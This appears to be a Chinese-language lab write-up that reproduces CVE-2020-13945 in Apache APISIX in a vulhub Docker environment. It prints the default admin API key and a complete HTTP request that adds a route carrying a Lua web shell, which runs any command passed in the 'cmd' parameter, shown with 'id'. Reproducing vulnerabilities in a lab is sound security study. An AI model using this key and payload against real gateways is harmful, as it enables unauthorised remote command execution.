CVE-2020-13945
Apache APISIX 默认密钥漏洞(CVE-2020-13945)复现一、 实验所需环境
1、Ubuntu
2、vulhub
3、apisix/CVE-2020-13945
二、 漏洞介绍
Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。
三、 漏洞复现
(1)进入vulhub,选择apisix/CVE-2020-13945漏洞环境,
输入命令启动:docker-compose up -d
https://img2022.cnblogs.com/blog/2575685/202206/2575685-20220603175752026-478830828.png
(2)环境启动成功后,访问http://your-ip:9080即可查看到默认的404页面。
https://img2022.cnblogs.com/blog/2575685/202206/2575685-20220603180030436-107289706.png
(3)使用Burp Suite抓包,利用默认Token增加一个恶意的router,
其中包含恶意LUA脚本:
POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()\n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}https://img2022.cnblogs.com/blog/2575685/202206/2575685-20220603182545613-2103365775.png
(4)然后,我们访问刚才添加的router,就可以通过cmd参数执行任意命令:http://your-ip:9080/attack?cmd=id
https://img2022.cnblogs.com/blog/2575685/202206/2575685-20220603182906267-2004080348.png
参考链接:
[*]https://github.com/vulhub/vulhub/blob/master/apisix/CVE-2020-13945
[*]https://apisix.apache.org/docs/apisix/getting-started
[*]https://github.com/apache/apisix/pull/2244
[*]https://seclists.org/oss-sec/2020/q4/187
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]